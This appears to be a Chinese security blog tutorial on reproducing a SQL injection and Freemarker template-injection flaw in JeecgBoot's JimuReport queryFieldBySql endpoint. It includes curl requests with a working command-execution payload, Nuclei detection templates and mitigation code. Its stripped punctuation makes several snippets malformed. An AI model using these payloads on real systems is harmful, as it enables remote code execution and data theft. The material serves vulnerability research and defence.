手把手教你复现JeecgBoot积木报表的SQL注入漏洞(附Nuclei模板)

张开发
2026/6/20 3:23:50 15 分钟阅读

最新文章

推荐文章

相关文章

分享文章

手把手教你复现JeecgBoot积木报表的SQL注入漏洞(附Nuclei模板)
深度解析JeecgBoot积木报表SQL注入漏洞的实战复现与自动化检测漏洞背景与影响范围JeecgBoot积木报表作为一款流行的企业级Web报表工具其queryFieldBySql接口的SQL注入漏洞引发了安全社区的广泛关注。这个漏洞的本质在于未对用户输入的SQL语句进行充分过滤和参数化处理导致攻击者能够通过精心构造的恶意输入直接操纵后端数据库。在实际渗透测试中我们发现该漏洞的危害程度被严重低估。攻击者不仅能够利用该漏洞执行任意SQL命令还能通过Freemarker模板引擎的特定语法实现远程代码执行。这意味着一个看似简单的SQL注入漏洞实际上可能成为整个系统沦陷的入口点。典型攻击场景包括数据库信息泄露获取用户凭证、业务数据等敏感信息数据库结构篡改添加/删除表、修改字段等通过数据库特定功能实现服务器端代码执行作为内网渗透的跳板进一步攻击其他系统1. 环境搭建与漏洞验证1.1 测试环境准备为了安全地复现该漏洞建议使用Docker快速搭建隔离的测试环境docker pull jeecgboot/jeecg-boot:latest docker run -d -p 8080:8080 --name jeecg-test jeecgboot/jeecg-boot验证环境是否正常运行curl -I http://localhost:8080/jmreport/queryFieldBySql1.2 基础漏洞验证使用cURL发送恶意请求验证漏洞存在curl -X POST http://localhost:8080/jmreport/queryFieldBySql \ -H Content-Type: application/json \ -d {sql:select 1}正常响应应返回查询结果。接下来测试注入curl -X POST http://localhost:8080/jmreport/queryFieldBySql \ -H Content-Type: application/json \ -d {sql:select \#assign value\freemarker.template.utility.Execute\?new()${value(\whoami\)}\}如果返回结果中包含当前系统用户信息则确认漏洞存在。2. 漏洞原理深度分析2.1 SQL注入形成机制该漏洞的核心问题在于积木报表对queryFieldBySql接口的输入处理存在缺陷未使用参数化查询直接将用户输入的SQL语句拼接执行缺乏输入过滤未对特殊字符如单引号进行转义处理过度信任前端输入未实施服务端严格的输入验证漏洞调用链HTTP请求 → 参数解析 → SQL拼接 → 直接执行 → 返回结果2.2 Freemarker模板注入分析更危险的是该漏洞还暴露了Freemarker模板引擎的执行能力#assign valuefreemarker.template.utility.Execute?new() ${value(任意命令)}这种二次注入使得漏洞危害从数据层提升到了系统命令执行层面。3. 自动化检测方案实现3.1 Nuclei模板开发基于漏洞特征我们可以创建高效的检测模板id: jeecgboot-sqli info: name: JeecgBoot积木报表SQL注入 author: security-researcher severity: high description: 检测JeecgBoot积木报表queryFieldBySql接口SQL注入漏洞 http: - method: POST path: - {{BaseURL}}/jmreport/queryFieldBySql headers: Content-Type: application/json body: {sql:select \test\\} matchers: - type: word words: - SQL syntax - You have an error condition: or3.2 高级检测逻辑优化为提高检测准确性可以加入以下策略时间盲注检测body: {sql:select sleep(5)} matchers: - type: elapsed elapsed: 5布尔盲注检测body: {sql:select case when (11) then 1 else 0 end} matchers: - type: word words: - 14. 防御措施与最佳实践4.1 临时缓解方案对于无法立即升级的系统建议WAF规则示例location /jmreport/queryFieldBySql { if ($request_body ~* ([\;]|(--)|(/\*))) { return 403; } proxy_pass http://jeecgboot_backend; }API访问控制限制接口访问IP范围增加API调用频率限制实施严格的认证鉴权4.2 根本性修复方案长期来看应从代码层面解决问题使用参数化查询String sql SELECT * FROM table WHERE id ?; PreparedStatement stmt connection.prepareStatement(sql); stmt.setString(1, userInput);输入验证白名单if (!userInput.matches(^[a-zA-Z0-9_]$)) { throw new IllegalArgumentException(Invalid input); }最小权限原则数据库账户使用最低必要权限禁用Freemarker危险方法在实际项目中我们遇到过因忽略权限配置而导致修复不彻底的情况。即使使用了参数化查询如果数据库账户权限过高攻击者仍可能通过合法查询获取敏感信息。因此完整的修复方案必须包含权限控制层面的考量。

更多文章